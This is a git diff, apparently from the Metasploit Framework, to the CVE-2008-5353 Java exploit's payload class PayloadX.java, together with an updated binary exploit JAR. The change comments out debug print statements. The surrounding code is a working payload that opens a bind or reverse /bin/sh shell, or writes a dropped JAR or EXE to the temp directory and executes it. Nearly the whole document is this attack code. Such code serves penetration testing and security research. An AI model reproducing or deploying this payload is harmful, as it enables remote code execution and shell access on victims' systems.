diff --git a/data/exploits/CVE-2008-5353.jar b/data/exploits/CVE-2008-5353.jar index 5338f0ee3c..93155a0ac2 100644 Binary files a/data/exploits/CVE-2008-5353.jar and b/data/exploits/CVE-2008-5353.jar differ diff --git a/external/source/exploits/CVE-2008-5353/src/msf/x/PayloadX.java b/external/source/exploits/CVE-2008-5353/src/msf/x/PayloadX.java index 01f9c6f3eb..32adaa3563 100644 --- a/external/source/exploits/CVE-2008-5353/src/msf/x/PayloadX.java +++ b/external/source/exploits/CVE-2008-5353/src/msf/x/PayloadX.java @@ -77,23 +77,23 @@ public class PayloadX implements PrivilegedExceptionAction public Object run() throws Exception { - System.out.println("Running"); + //System.out.println("Running"); // if the native payload data has not been set just return for now, it // will be set by the next time we reach here. if( PayloadX.data == null && PayloadX.jar == null ) return null; - System.out.println("have either data or jar"); + //System.out.println("have either data or jar"); try { String os = System.getProperty( "os.name" ); - System.out.println("OS: " + os); + //System.out.println("OS: " + os); // if we have no native payload to drop and execute we default to // either a TCP bind or reverse shell. if( PayloadX.data.length() == 0 && PayloadX.jar.length() == 0 ) { - System.out.println("no, exe/jar. Doing shell"); + //System.out.println("no, exe/jar. Doing shell"); Socket client_socket = null; String shell = "/bin/sh"; @@ -123,7 +123,7 @@ public class PayloadX implements PrivilegedExceptionAction } else if( PayloadX.jar != null && (PayloadX.jar.length() != 0) ) { - System.out.println("Dropping JAR"); + //System.out.println("Dropping JAR"); String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".jar"; writeFile( path, StringToBytes( PayloadX.jar ) ); @@ -131,7 +131,7 @@ public class PayloadX implements PrivilegedExceptionAction } else { - System.out.println("Dropping EXE"); + //System.out.println("Dropping EXE"); String path = System.getProperty( "java.io.tmpdir" ) + File.separator + Math.random() + ".exe"; writeFile( path, StringToBytes( PayloadX.data ) ); @@ -144,7 +144,7 @@ public class PayloadX implements PrivilegedExceptionAction } } catch( Exception e ) { - System.out.println(e); + //System.out.println(e); } return null; @@ -153,30 +153,30 @@ public class PayloadX implements PrivilegedExceptionAction public Process exec( String path ) { Process p = null; - System.out.println( "Executing" ); + //System.out.println( "Executing" ); try { p = Runtime.getRuntime().exec( path ); if( p == null ) { - System.out.println( "Null process, crap" ); + //System.out.println( "Null process, crap" ); } p.waitFor(); } catch( Exception e ) { - System.out.println(e); + //System.out.println(e); } return p; } public void writeFile( String path, byte[] data ) { - System.out.println( "Writing file" ); + //System.out.println( "Writing file" ); try { FileOutputStream fos = new FileOutputStream( path ); fos.write( data ); fos.close(); } catch( Exception e ) { - System.out.println(e); + //System.out.println(e); } }